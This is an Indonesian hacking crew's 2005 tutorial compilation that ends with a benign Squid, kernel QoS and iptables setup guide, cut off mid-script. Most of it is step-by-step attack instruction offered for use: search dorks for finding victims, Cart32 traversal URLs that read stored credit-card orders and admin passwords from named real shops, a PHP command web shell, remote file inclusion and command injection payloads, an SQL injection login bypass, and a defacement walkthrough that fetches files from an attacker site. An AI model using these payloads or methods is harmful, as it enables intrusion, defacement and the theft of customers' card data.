TUTORIAL HACKING

TUTORIAL HACKING

KOMUNITAS #SOLOHACKERLINK

Allnet + Dalnet

Kumpulan tutorial ini kami persembahkan bagi anda yang pingin belajar Hacking,

Defacing, Cracking, dan yang berhubungan dengan dunia Komputer.

Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.

-ChanServ- -- Access List for [#solohackerlink] --

-ChanServ- Num Level Hostmask Since last use

-ChanServ- --- ----- -------- --------------

-ChanServ- 1 30 CoCoNuT 1h 18m 36s

-ChanServ- 2 20 Shidex 6d 2h 52m 6s

-ChanServ- 3 10 erisanthi 4w 4d 4h 9m 44s

-ChanServ- 4 25 moxff 8h 25m 27s

-ChanServ- 5 30 CiPaN-2

-ChanServ- 6 20 SouLmaTe 4d 7h 34m 36s

-ChanServ- 7 30 A-kung 2d 2h 48m 50s

-ChanServ- 8 30 hikaru 1w 2d 9h 41m 4s

-ChanServ- 9 20 kenshi 3d 3h 5m 39s

-ChanServ- 10 30 vend3r 3d 13h 54m 51s

-ChanServ- 11 20 ijoo 5d 17h 20m 27s

-ChanServ- 12 10 asLpLs 6d 3h 11m 42s

-ChanServ- 13 15 AnEuk_TeRmin4L 1d 8h 29m 53s

-ChanServ- 14 20 Viper 4d 9h 38m 44s

-ChanServ- 15 44 ToxiCity 3d 3h 24m 9s

-ChanServ- 16 10 [MICROBA] 2d 9h 21m 53s

-ChanServ- 17 14 arioo 1d 23h 26m 29s

-ChanServ- 18 45 SoniX 6h 53m 12s

-ChanServ- 19 10 mozi 3w 4d 1h 5m 39s

-ChanServ- 20 35 Chiboik 2d 2h 48m 55s

-ChanServ- 21 30 WONGEDAN 2d 14h 35m 59s

-ChanServ- 22 10 co_world 1d 9h 52m 12s

-ChanServ- 23 15 rafles 3w 1d 6h 45m 31s

-ChanServ- 24 20 gueng 4d 9h 52m 29s

-ChanServ- 25 15 H4_Kim 1h 1m 18s

-ChanServ- 26 20 djempol 3d 13h 52m 23s

-ChanServ- 27 10 maha_dewa 2d 4h 12m 40s

-ChanServ- 28 10 KuThiLaNK 1d 16m 27s

-ChanServ- 29 40 Pria 3w 10h 37m 37s

-ChanServ- 30 44 jayoes 2h 31m 18s

-ChanServ- 31 20 mikael_boloten 2d 8h 55m 50s

-ChanServ- 32 42 avantika 2w 1d 6h 38m 1s

-ChanServ- 33 40 Cybermoslem 4d 11h 25m 24s

-ChanServ- 34 25 senyum 3d 14h 47m 5s

-ChanServ- 35 44 Bamby 3d 5h 21m 46s

-ChanServ- 36 40 randyy 4d 5h 29m 45s

-ChanServ- 37 30 GeoL 3d 2h 54m 38s

-ChanServ- 38 35 skin 3h 58m 56s

-ChanServ- 39 28 padllepop 23h 42m 53s

-ChanServ- 40 48 saleho 1h 19m 17s

-ChanServ- 41 47 Kiluagank 1w 3d 11h 21m 23s

-ChanServ- 42 15 Pleky 2d 4h 11m 51s

-ChanServ- 43 10 ^YoGa^ 2w 2d 20h 46m 7s

-ChanServ- 44 50 POM_PONK 0s

-ChanServ- 45 10 ahas 8h 57m

-ChanServ- 46 49 eStI 5d 37m 6s

-ChanServ- 47 13 pingembul 2d 11h 7m 42s

-ChanServ- 48 45 garAm 4d 5h 50m 35s

-ChanServ- 49 45 OsKaDoN 2h 31m 51s

-ChanServ- 50 42 andri 23h 20m 48s

-ChanServ- 51 25 Blu3_Cyber 1d 14h 40m 29s

-ChanServ- 52 15 data_base 5w 4d 19h 27m 27s

-ChanServ- 53 48 PeNcOpEt_CiNtA 4d 23h 39m 14s

-ChanServ- 54 9 Dewa_Cinta 14h 47m 42s

-ChanServ- 55 30 RENDY_CO 6w 3d 5h 10m 35s

-ChanServ- 56 30 kethex 6w 2d 9h 52m 22s

-ChanServ- 57 15 SpY|DeR 4d 2h 31m 13s

-ChanServ- 58 35 SkyLine 1w 1d 5h 17m 58s

-ChanServ- 59 20 siti^oke

-ChanServ- 60 35 ajbtk_anton 1w 6d 8h 6m 58s

-ChanServ- 61 25 SaWeX 14w 2d 21h 24m 20s

-ChanServ- 62 15 Teguh 2w 2d 8h 29m 51s

-ChanServ- 63 15 vender 3d 14h 41m 35s

-ChanServ- 64 44 ad|fashLa 1w 8h 50m 58s

-ChanServ- 65 20 IrwansyaH 4d 14h 48m 48s

-ChanServ- 66 25 Comex 4d 5h 32m 40s

-ChanServ- 67 20 Aves 1w 1d 10h 50m 17s

-ChanServ- 68 10 Reny 3w 4d 7h 16m 19s

-ChanServ- 69 44 Malaikat^Mikhael 19h 19m 3s

-ChanServ- 70 40 BuayA 3d 12h 56m 36s

-ChanServ- 71 15 blu_smith87 1d 6h 23m 27s

-ChanServ- 72 20 ricky 11h 36m 28s

-ChanServ- 73 40 madiun 3w 5d 15h 1m 46s

-ChanServ- 74 45 solohackerlink 2w 4d 5h 5m 50s

-ChanServ- 75 20 sTeVe_YaN9_SDiKiT_ImOeT 4d 2h 32m 8s

-ChanServ- 76 15 AndyBogard 2w 2d 12h 53m 41s

-ChanServ- 77 44 cupid 19h 26m 44s

-ChanServ- 78 47 TAKESI 6s

-ChanServ- 79 20 wahyu_20 11h 15m 41s

-ChanServ- 80 20 WoNg`Edan 7h 2m 9s

-ChanServ- 81 15 GoD_Army 4d 5h 15m 12s

-ChanServ- 82 14 Pico 1d 2h 37m 59s

-ChanServ- 83 44 cOCa-cOLa 15h 20m 30s

-ChanServ- 84 20 SuPeR_MaN 9h 48m 37s

-ChanServ- -- End of list --

Cart32 v3.5a

##############################################################################

#

TUTORIAL I : Cart32 v3.5a

by : PeNcOpEt_CiNtA

Posted : 11 oktober 2005

##############################################################################

#

NB : Hanya bisa digunakan kepada beberapa situs yang memiliki kelemahan

yang sama.

Langkah 1: Dapatkan terlebih dahulu Website Cart32 v3.5a

Langkah 2: Cari di semua searc engine yang kamu ketahui.

dengan keyword " Cart32 v3.5a "

Langkah 3: Masuk ke website Cart32.exe

http://target/login/unicode/cart32.exe

(contoh : http://www.connectionsmall.com/scripts/cart32.exe/)

Langkah 4: Setelah kamu masuk kesana, akan diperlihatkan tampilan

seperti dibawah ini :

========================================

Cart32 v3.5a

Shopping Cart System for Windows

http://www.cart32.com/

Registered to Greymane ConnectionsLicense: Unlimited clients

©1996-2001 McMurtrey/Whitaker & Associates, Inc.Build 714

========================================

Langkah 4: Sekarang yang harus kamu lakukan adalah memasukkan ekstensi

berikut di akhir URL, 98% memakai #1 & #2

a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:)

b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:)

c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:)

HANYA DIGUNAKAN KADANG2!

(contoh:http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%

af../winnt/system32/cmd.exe?/c+dir+c:)

Langkah 5: Saat kamu berada di direktori utama (c:), untuk masuk ke

cc´s, masukan kembali (progra~1MWAIncCart32) ke akhir URL tadi

sehingga sekarang kamu dapat melihat seperti :

http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%

af../winnt/system32/cmd.exe?/c+dir+c:progra~1mwainccart32

Sekarang kamu dapat melihat banyak file seperti :

2814659000-001001.c32

2814659000-001002.c32

2814659000-001003.c32

Langkah 6: Copy salah satu dari nama file tersebut dan kemudian

masukkan ke akhir URL, dan akan terlihat seperti :

http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%

af../winnt/system32/cmd.exe?/c+type+c:progra~1mwainccart322814659000-001003.c32

Catatan : Diistu kamu akan melihat file lain yang berisi banyak sekali

cc´s seperti :

RONACK-orders.txt (file ini tidak berada pada situs yang khusus ini)

procure-orders.txt (file ini tidak berada pada situs yang khusus ini)

Langkah 7: Sebelum kamu mengakses tipe file yang lain, pertama kamu harus mengganti

*c+dir+c:* ke *c+type+c:*

========================================

TUTORIAL II : Cart32 v3.5a

----------------------------------------

Target: http://www.partybows.com

1. Ke http://www.partybows.com

2. Klik http://www.partybows.com/seasonal.htm

3. Isi Quantity= 1 Pokoknya kayak lu pura2x beli dan klik order

4. Maka akan kesini jadinya :

https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem

5. Ubah menjadi

https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error

Cart32 v3.5 Error

CART32 Build 619

The following internal error has occurred: Invalid procedure

Error Number = 5

Click Here For Possible Solutions

etc.

6. Cari log order-nya

Cart32 Setup Info and Directory

Mail Server = mail.axion.net Section=Main

AdminDir = D:securewebrootpartybowscgi-bincart32

Jadi partybows-orders.txt.

Sehingga akhirnya :

http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt

7. Atau untuk mendapatkan Password admin nyah loe tinggak ketik cart32.ini

https://secure.axionet.com/partybows/cgi-bin/cart32.ini

dengan tidak di sengaja kamu akan mendownload Password admin

yang ada di file cart32.ini nyah.

kamu akan mendapat kan password admin yang terencriptsi

lalu kamu coba mendecriptkan nyah dengan software

" Cart32decoder.exe "

8. Untuk mendapatkan data nama dan password clients pada Cart32

kamu bisa mencobanya dengan mengetik "CLIENT.DBF"

atau :

order file pada "ORDER atau ORDERS.DBF

========================================

TUTORIAL III : Cart32 v3.5a

----------------------------------------

search +/scripts/cart32.exe/

Exploitable Directories

-/scripts/cart32.ini

-/scripts/cart32.exe

-/scripts/cart32.exe/cart32clientlist

-/script/c32web.exe/ChangeAdminPassword

-/scripts/c32web.exe

-cgi-shl/c32web.exe/

Wherever there is the cart32.exe add this to the end of it /cart32clientlist

and erase the rest a menu will come up with a submit box click go

it will list ALL clients and their passwords passwords will be encrypted

after decrypting the password, go to wherever the [c32web.exe] file is

thats the instructions wit exploits what that channel we were just in called

-------------------------------------------------------------------------------------------------

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 08:56:21 ]

My_eGallery security exploit

##############################################

My_eGallery security exploit

Author : PeNcOpEt_CiNtA ( seng_due@yahoo.co.id )

##############################################

Bugs File may be : displayCategory.php

Display : http://www.target.com/modules/My_eGallery/public/displayCategory.php

Note :

for attacking u must use this script, save and upload to your website.

e.g save with namefile : cmd.txt

e.g from my site : http://www.geocities.com/seng_due/script/solohackerlink.txt

---------------- script from here -----------------------------------------------------

PeNcOpEt_CiNtA - WAS HERE !!!

TEST SYSTEM KEAMANAN SERVER ANDA!!!

size="1">

src="http://www.geocities.com/aritrokok/aritrokok.jpg"

# saleho PHP :

# Released by : Solohackerlink-Crew

---

 
 
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
 
if (isset($chdir)) @chdir($chdir);
 
ob_start();
 
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
 
$output = ob_get_contents();
 
ob_end_clean();
 
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
 
?>
 

---

#SOLOHACKERLINK

------------------ End of Script ---------------------------------------------------------

###################################

Ok and now let´s Search your Target

###################################

1. search in all search engine e.g --> "allinurl:displayCategory.php" or "My_eGallery"

2. Get the target site like -->

http://www.target.com/modules/My_eGallery/public/displayCategory.php

3. test to attack with code :

?basepath=http://if-istp.net/cmd.txt?&cmd=uname -a;id;

4. Display attacking :

http://www.target.com/modules/My_eGallery/public/displayCategory.php?basepath=http://ifistp.

net/cmd.txt?&cmd=uname -a;id;

5. Linux and Unix command Used in here :P~ e.g : ls -al , uname -r , cat , echo , etc....

6. So, What are U waiting For !!!

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:53:10 ]

s-cart vulnerability

##############################################

S-Cart Bugs injection

Author : PeNcOpEt_CiNtA

##############################################

Bugs File : admin page --> /admin

Display : http://target.com/s-cart/admin

1. search in all search engine e.g --> allinurl:s-cart/index.phtml or "s-cart"

2. Get the target site like --> http://www.target.com/s-cart/index.phtml

3. and now go to admin page with change the Url to :

http://www.target.com/s-cart/admin --> auto open browser with login and passwd !!!

login : admin

passwd : ´or´´=´

4. If U are lucky, u can see the admin manager, show the table Order now or Deface s-cart page.

Ok let´s to try :P~

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:49:25 ]

display.cgi vulnerability

##############################################

Abrior´s Encore WebForum ( display.cgi )

Author : PeNcOpEt_CiNtA ( seng_due@yahoo.co.id )

Forum : #Cracked On aLL.NeT

##############################################

Bugs File : /forumcgi/display.cgi?

Display : http://www.target.com/encore/forumcgi/display.cgi?

1. search in all search engine e.g --> allinurl:forumcgi/display.cgi?

2. Get the target site like --> http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp

3. and now go to the exploit with insert this code :

&page=anonymous&file=|uname%20-a|

4. Full Display like :

http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|

uname%20-a|

5. Linux or Unix command available in here... Good Luck :P~

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:48:30 ]

cutenews vulnerability

********************************************

PeNcOpEt_CiNtA From Solohackerlink

********************************************

bug kali ini menimpa pada cuteNews milik php dimana bug ini menimpa pada shownews.php

variabel cutepath ini sebagai eksekusi.kamu bisa menggunakan news.txt atau config.php untuk

mengetahui command dari php

oke..kita lanjut saja...

konsep hackingnya sebagai berikut:

http://target.com/cutenews/shownews.php?cutepath=http://inject.com

sekarang bagaimana kita memperoleh target tersebut???

hehehehe penasaran ya...ok..kita buka paman google, dan kasih perintah kata kunci sebagai

berikut:

inurl:cutenews/shownews.php

ntuh....banyak kan....

contohnya:

www.flip-script.com/cutenews/shownews.php

kemudian kamu ubah menjadi begini

http://www.flipscript.

com/cutenews/shownews.php?cutepath=http://geocities.com/seng_due/script/solohackerlin

k.txt?&cmd=id

hehehe dan lihat apa yang terjadi....

selanjutnya kamu bisa bereksperimen sendiri OK....

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:43:10 ]

titip file

MENITIPKAN FILE DI SITUS YANG MEMPUNYAI CELAH KEAMANAN

(orang lain mungkin menyebutnya deface)

Hehehe, aneh yah judulnya.... Padahal orang lain mungkin akan lebih suka untuk menyebutnya

sebagai deface. Sebenarnya ada sedikit perbedaan antara deface dan menitipkan file, deface

adalah mengubah tampilan suatu situs baik halaman utama atau bukan (sifatnya agak sedikit

merusak), sedangkan menitipkan file hanya meletakkan file tersendiri di suatu situs tanpa

mengubah halaman tertentu dari situs yang disusupi.

OK... saya rasa cukup basa-basinya. Kita langsung masuk ke pembahasan utama.

Ada lumayan banyak langkah yang diperlukan untuk bisa menitipkan file di suatu situs yang

mempunyai celah keamanan.

1. Pelajari command dasar sistem operasi, baik windows maupun keluarga *nix (Linux, BSD,

MacOS, SunOS, Unix, dll)

2. Cari dan pelajari bug-bug aplikasi web yang ada.

3. Pelajari cara menggunakan search engine (terutama Google).

4. Siapkan beberapa file yang mungkin akan digunakan nantinya, lalu simpan di suatu situs (kalo

gak mampu beli yaaaa.... buat situs gratisan aja)

5. Pelajari cara mencari daftar situs di suatu server (biasanya satu situs bisa terdiri dari banyak

situs, bahkan ada yang ratusan)

1. Command dasar sistem operasi

Berikut ini akan saya jelaskan beberapa command dasar dari sistem operasi, baik windows

maupun *nix yang mungkin berguna saat menyusup ke suatu sistem nantinya.

Untuk mencoba menjalankan command-command dasar tersebut, di windows gunakan DOS

prompt, sedangkan di *nix menggunakan sh, bash, bsh dan lain-lain (command line interface).

Jika anda pengguna windows dan tetap ingin mencoba command *nix bagaimana ? Coba cari

situs-situs yang menyediakan shell gratis, yang bisa dijalankan menggunakan telnet atau putty.

DOS *NIX Keterangan

dir ls Melihat daftar file di suatu direktori

ren mv Mengganti nama file

copy cp Menggandakan file

del rm Menghapus file atau direktori

mkdir mkdir Membuat direktori baru

type cat Melihat isi suatu file

cd Cd Berpindah direktori

Pwd Melihat direktori aktif

2. Bug aplikasi web

Ada beberapa jenis bug diantaranya adalah remote command execution, file injection, sql

injection.

Contoh :

Phpbb2 remote command executuon:

http://korban.com/viewtopic.php?t=1&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%

2527&cmd=id;pwd;ls –al

Cgi remote command execution

http://korban.com/index.cgi?page=view.txt|id;pwd|

Php file injection

http://korban.com/index.php?file=http://situsmu.com/file_inject.txt?cmd=id;pwd

Asp-MsSQL Sql injection

http://korban.com/index.asp?id=1;update table set field5=’hacked’ where field1=1

Untuk mendapatkan lebih banyak bug-bug aplikasi web, silakan mengunjungi situs-situs

keamanan atau situs-situs hacker yang ada.

3. Mengunakan search engine (Google)

Google adalah mesin pencari yang sangat sering digunakan oleh hacker untuk mencari situs-situs

yang mempunyai celah keamanan. Ada beberapa option yang bisa ditambahkan pada keyword

untuk mempersempit pencarian.

Allinurl:file_manager.php Я mencari situs yang ada file file_manager.php saja

Intitle:hacked Я mencari situs yang title nya ada kata hacked

Masih ada beberapa option lagi yang bisa digunakan. Option-option tersebut bisa digunakan

bersamaan agar lingkup hasil pencarian lebih sempit lagi.

Silakan membacanya langsung di google.com atau di situs-situs hacker untuk keterangan lebih

lanjut.

4. File yang mungkin dibutuhkan

Berikut ini adalah file-file yang mungkin dibutuhkan untuk melakukan penyusupan.

Phpshell

Phpshell bisa digunakan untuk exploitasi bug file injection atau di simpan di situs yang telah

berhasil di susupi untuk menjalankan command shell dari suatu sistem yang menggunakan php

sebagai bahasa pemrograman web nya

Cgitelnet

Cgi telnet hanya bisa dijalankan jika sudah tertanam di suatu situs, fungsinya sama dengan

phpshell yaitu menjalankan command shell. Untuk situs yang menggunakan Perl.

cmdAsp

sama fungsinya dengan phpshell dan cgi telnet pada situs yang menggunakan asp

5. Mencari nama dan direktori situs lain dalam satu server

Ada beberapa cara yang bisa digunakan (*nix), dengan asumsi bahwa id yang kita dapatkan

adalah apache, nobody, httpd, atau www. Jika id yang kita dapatkan adalah nama user maka

selamat... kita bisa deface halaman utama.

a. httpd.conf

Cari file httpd.conf, dengan menjalankan perintah locate httpd.conf.

Misalkan hasilnya /etc/httpd/httpd.conf, lihat isinya dengan perintah cat /etc/httpd/httpd.conf

Jika kita beruntung maka dalam file tersebut terdapat daftar nama situs berikut direktori root nya.

Jika tidak ada, gunakan cara lain.

b. /etc/passwd

Kita bisa menggunakan file /etc/passwd untuk meraba keberadaan direktori situs

Caranya, jalankan perintah pwd, misalkan hasilnya /home/telo/public_html

Selanjutnya lihat isi file /etc/passwd dengan command cat /etc/passwd

Lihat isinya, perhatikan semua daftar user yang mengandung kata /home

Misalnya /home/user1, /home/user2

Dari sini kita hanya mendapatkan direktori root dari suatu situs, tetapi belum mengetahui nama

situsnya.

Lalu bagaimana cara untuk mengetahui? Cara manual, yaitu dengan melihat-lihat isi dari file-file

yg ada di dirrektori situs tersebut, misalkan cd /home/user1/public_html;cat index.html, cara ini

memerlukan sedikit kesabaran J

c. /home

misal hasil pwd /home/telo/public_html.

Jalankan perintah ls /home untuk melihat isi dari direktori /home

Jika ada hsailnya berarti kita cukup beruntung karena kabanyakan server tidak mengijinkan

nobody untuk melihat isi direktori tersebut.

Selanjutnya hampir sama dengan bagian b di atas, cara ini juga mirip jika kita mendapatkan hasil

pwd seperti /etc/www/vhost/teloganyong.com/httpdocs.

OK, sementara cukup perkenalannya, sekarang kita coba langsung ke kasus yang mendekati

nyata.

Sebagai gambaran, saya lebih suka jika mendapatkan bug php file injection, maka bug ini

sebagai contoh J

http://korban.com/index.php?file=http://situsmu.com/inject.txt? (jangan lupa karakter tanda tanya)

(saya anggap file inject.txt nya berupa satu textbox dan satu tombol submit)

1. Masukkan perintah id;pwd;ls –al

2. perhatikan hasilnya, selanjutnya kita anggap hasilnya id=nobody,

pwd=/home/korban/public_html, dan hasil ls –al tidak perlu disebutkan.

3. Cari tempat dimana kita diberi ijin menulis, caranya dengan menjalankan perintah

find /home/korban/public_html –perm 777 -type d

4. Jika ada daftar direktori yang muncul dari perintah no 3, berarti kita bisa menulis

5. Misalkan hasilnya /home/korban/public_html/images

6. Masukkan file yang ingin ditanamkan dengan cara menjalankan perintah

cd /home/korban/public_html/images;wget http://situsmu.com/deface.html;ls (misalnya), perintah

ls digunakan untuk memeriksa apakah file berhasil di susupkan

7. Jika berhasil maka kita bisa mengakses file tersebut ke http://korban.com/images/deface.html

8. selesai

catatan: untuk perintah memasukkan file, mungkin saja wget tidak ada atau memerlukan option

tambahan, silakan mencoba cara lain berikut ini

wget http://situsmu.com/deface.html

wget –o deface.html http://situsmu.com/deface.html

curl –o deface html http://situsmu.com/deface.html

lwp-download http://situsmu.com/deface.html

fetch http://situsmu.com/deface.html

linx http://situsmu.com/deface.html

jika masih tidak berhasil juga silakan menggunakan perintah echo untuk menulis file secara

langsung

cd /home/korban/public_html/images;echo tested by telo > telo.html;ls

http://korban.com/images/telo.html

Post by : x`shell on [ 10 November 2005 17:43:02 ]

Installasi Squid + Compile Kernel + HTB + IPTABLES

Installasi Squid + Compile Kernel + HTB + IPTABLES

==================================================

Konfigurasi ini ditujukan pada Madya (c3p0t) dan Dana (suheng) Warnet Citra Pangkalpinang dan

Warnet Speednet Pangkalpinang.

Download Source Squid :

wget -c http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE7.tar.bz2

Ekstrak Source Squid :

tar -jxf squid-2.5.STABLE7.tar.bz2

Configure Squid :

cd squid-2.5.STABLE7

pastikan paket glibc terinstall di sistem:

installpkg /mnt/cdrom/slackware/l/glibc*.tgz

./configure --prefix=/usr/local/squid

--exec-prefix=/usr/local/squid

--enable-delay-pools --enable-cache-diggests

--disable-ident-lookups --enable-async-io=16

--enable-removal-policies="lru,heap"

--enable-poll --enable-linux-netfilter

Installasi Squid:

make

make install

File squid.conf standard :

##########################

http_port 3128

icp_port 3130

hierarchy_stoplist cgi-bin ?

acl QUERY urlpath_regex cgi-bin ?

no_cache deny QUERY

cache_mem 8 MB

cache_swap_low 90

cache_swap_high 95

cache_replacement_policy lru

cache_dir ufs /usr/local/squid/var/cache 1000 16 256

cache_access_log /usr/local/squid/var/logs/access.log

cache_log /usr/local/squid/var/logs/cache.log

cache_store_log none

mime_table /usr/local/squid/etc/mime.conf

pid_filename /usr/local/squid/var/logs/squid.pid

debug_options ALL,1

ftp_user Squid@

ftp_list_width 32

ftp_passive on

dns_nameservers 127.0.0.1

refresh_pattern ^ftp: 1440 20% 10080

refresh_pattern ^gopher: 1440 0% 1440

refresh_pattern . 0 20% 4320

acl all src 0.0.0.0/0.0.0.0

acl manager proto cache_object

acl localhost src 127.0.0.1/255.255.255.255

acl to_localhost dst 127.0.0.0/8

acl SSL_ports port 443 563 8443

acl Safe_ports port 80 # http

acl Safe_ports port 21 # ftp

acl Safe_ports port 443 563 # https, snews

acl Safe_ports port 70 # gopher

acl Safe_ports port 210 # wais

acl Safe_ports port 1025-65535 # unregistered ports

acl Safe_ports port 280 # http-mgmt

acl Safe_ports port 488 # gss-http

acl Safe_ports port 591 # filemaker

acl Safe_ports port 777 # multiling http

acl CONNECT method CONNECT

http_access allow manager localhost

http_access deny manager

http_access deny !Safe_ports

http_access deny CONNECT !SSL_ports

acl our_networks src 192.168.1.0/24

http_access allow our_networks

acl IIX dst_as 7713 4795 7597 4622 4787 4800

always_direct allow IIX

http_access deny all

cache_mgr webmaster

cache_effective_user squid

cache_effective_group squid

visible_hostname warnet.citra.com

httpd_accel_host virtual

httpd_accel_port 80

httpd_accel_with_proxy on

httpd_accel_uses_host_header on

################################

configurasi lainnya bisa di baca di squid.conf.default

Menjalankan squid pertama kali:

groupadd -g 8080 squid

useradd -g 8080 -u 8080 -s /bin/false -d /usr/local/squid squid

mengecek kesalahan config:

/usr/local/squid/sbin/squid -k parse

membuat directory cache:

/usr/local/squid/sbin/squid -z

Menjalankan squid :

/usr/local/squid/sbin/squid -DY

(masukkan juga di rc.local)

Compile Kernel :

================

Compile kernel digunakan untuk optimasi kernel dikemudian hari. disini kita menambahkan option

QoS untuk fasilitas bandwitdh limiter. pastikan packet Ncurse sudah terinstall

installpkg /mnt/cdrom/slackware/l/ncurse*.tgz

cd /usr/src/linux

make menuconfig

Networking options --->

QoS and/or fair queueing --->

¦ ¦ [*] QoS and/or fair queueing ¦ ¦

¦ ¦ CBQ packet scheduler ¦ ¦

¦ ¦ HTB packet scheduler ¦ ¦

¦ ¦ CSZ packet scheduler ¦ ¦

¦ ¦ The simplest PRIO pseudoscheduler ¦ ¦

¦ ¦ RED queue ¦ ¦

¦ ¦ SFQ queue ¦ ¦

¦ ¦ TEQL queue ¦ ¦

¦ ¦ TBF queue ¦ ¦

¦ ¦ GRED queue ¦ ¦

¦ ¦ Diffserv field marker ¦ ¦

¦ ¦ Ingress Qdisc ¦ ¦

¦ ¦ [*] QoS support ¦ ¦

¦ ¦ [*] Rate estimator ¦ ¦

¦ ¦ [*] Packet classifier API ¦ ¦

¦ ¦ TC index classifier ¦ ¦

¦ ¦ Routing table based classifier ¦ ¦

¦ ¦ Firewall based classifier ¦ ¦

¦ ¦ U32 classifier ¦ ¦

¦ ¦ Special RSVP classifier ¦ ¦

¦ ¦ Special RSVP classifier for IPv6 ¦ ¦

¦ ¦ [*] Traffic policing (needed for in/egress) ¦ ¦

keluar (exit) dan simpan configurasi diatas

make dep

make clean

make modules

make modules_install

make bzImage

Configurasi Bootloader

cp System.map /boot/System.map-qos

cp arch/i386/boot/bzImage /boot/vmlinuz-qos

pico /etc/lilo.conf

###########################

# Start LILO global section

boot = /dev/hda

message = /boot/boot_message.txt

prompt

timeout = 1200

# Override dangerous defaults that rewrite the partition table:

change-rules

reset

# Normal VGA console

vga = normal

# Linux bootable partition config begins

image = /boot/vmlinuz-qos

root = /dev/hda2

label = Linux-QOS

read-only

# Linux bootable partition config ends

# Linux bootable partition config begins

image = /boot/vmlinuz

root = /dev/hda2

label = Linux

read-only

# Linux bootable partition config ends

##############################

reboot

HTB Bandwitdh Managemen

=======================

Dalam percobaan ini ada 3 buah komputer.

Total Bandwith Internet downlink 64 Kbps dan upstrime tidak dibatasi

komputer 1 bernama madya dengan ip 192.168.1.2, akan di beri jatah downlink 32 Kbps

komputer 2 bernama dana dengan ip 192.168.1.3, akan di beri jatah downlink 16Kbps

komputer 3 bernama dion dengan ip 192.168.1.4, akan di beri jatah downlink 16Kbps

download HTB.INIT

wget http://aleron.dl.sourceforge.net/sourceforge/htbinit/htb.init-v0.8.5

cp htb.init-v0.8.5 /usr/sbin/htb.init

chmod 755 /usr/sbin/htb.init

membuat direktory htb

mkdir -p /etc/sysconfig/htb

pico /etc/sysconfig/htb/eth0

R2Q=1

pico /etc/sysconfig/htb/eth0-10.root

RATE=64Kbit

QUANTUM=1500

pico /etc/sysconfig/htb/eth0-10:1.madya

RATE=32Kbit

QUANTUM=1500

CEIL=64Kbit

LEAF=sfq

RULE=192.168.1.2/32,

pico /etc/sysconfig/htb/eth0-10:2.dana

RATE=16Kbit

QUANTUM=1500

CEIL=64Kbit

LEAF=sfq

RULE=192.168.1.3/32,

pico /etc/sysconfig/htb/eth0-10:3.dion

RATE=16Kbit

QUANTUM=1500

CEIL=64Kbit

LEAF=sfq

RULE=192.168.1.4/32,

Install iproute2 dari src.teras.net.id

installpkg http://src.teras.net.id/slack-pkg/iproute2-2.4.7_now_ss020116_try-i386-4.tgz

download pacth tc dari docum.org

wget http://www.docum.org/docum.org/download/tc.bz2

ekstrak tc dan copy ke /sbin/

bunzip2 tc.bz2

cp tc /sbin/

chmod 755 /sbin/tc

Compile htb.init

htb.init compile

Start htb.init

htb.init start

Jika tidak ada eror berarti anda selesai menginstall htb bandwitdh limiter, jangan lupa htb.init start

dimasukkan kedalam rc.local

IPTABLES

========

##############################################################################

###

# perintah menjalankan scripts: firewall (start|stop|restart|status) EXTIF INTIF

# contoh: "firewall start ppp0 eth0"

##############################################################################

###

#!/bin/sh

IPTABLES="/usr/sbin/iptables"

case "$1" in

stop)

echo "firewall dimatikan..!!!"

$IPTABLES -F

$IPTABLES -F -t mangle

$IPTABLES -F -t nat

$IPTABLES -X

$IPTABLES -X -t mangle

$IPTABLES -X -t nat

$IPTABLES -P INPUT ACCEPT

$IPTABLES -P OUTPUT ACCEPT

$IPTABLES -P FORWARD ACCEPT

echo "...done"

;;

status)

echo $"Table: filter"

iptables --list

echo $"Table: nat"

iptables -t nat --list

echo $"Table: mangle"

iptables -t mangle --list

;;

restart|reload)

$0 stop

$0 start

;;

start)

echo "Benteng Firewall diaktifkan"

echo ""

DEFAULT_EXTIF="ppp0"

DEFAULT_INTIF="eth0"

UNIVERSE="0.0.0.0/0"

UNPRIVPORTS="1024:65535"

XWINPORTS="6000:6063"

IRCPORTS="6665,6666,6667,6668,6669,7000"

#-----Port-Forwarding Variables-----#

#For port-forwarding to an internal host, define a variable with the appropriate

#internal IP-Address here and take a look at the port-forwarding sections in the FORWARD +

#PREROUTING-chain:

#These are examples, uncomment to activate

#IP for forwarded Battlecom-traffic

#BATTLECOMIP="192.168.0.5"

#IP for forwarded HTTP-traffic

#HTTPIP="192.168.0.20"

#----Flood Variables-----#

# Overall Limit for TCP-SYN-Flood detection

TCPSYNLIMIT="5/s"

# Burst Limit for TCP-SYN-Flood detection

TCPSYNLIMITBURST="10"

# Overall Limit for Loggging in Logging-Chains

LOGLIMIT="2/s"

# Burst Limit for Logging in Logging-Chains

LOGLIMITBURST="10"

# Overall Limit for Ping-Flood-Detection

PINGLIMIT="5/s"

# Burst Limit for Ping-Flood-Detection

PINGLIMITBURST="10"

#----Automatically determine infos about involved interfaces-----#

### External Interface:

## Get external interface from command-line

## If no interface is specified then set $DEFAULT_EXTIF as EXTIF

if [ "x$2" != "x" ]; then

EXTIF=$2

else

EXTIF=$DEFAULT_EXTIF

fi

echo External Interface: $EXTIF

## Determine external IP

EXTIP="`ifconfig $EXTIF | grep inet | cut -d : -f 2 | cut -d -f 1`"

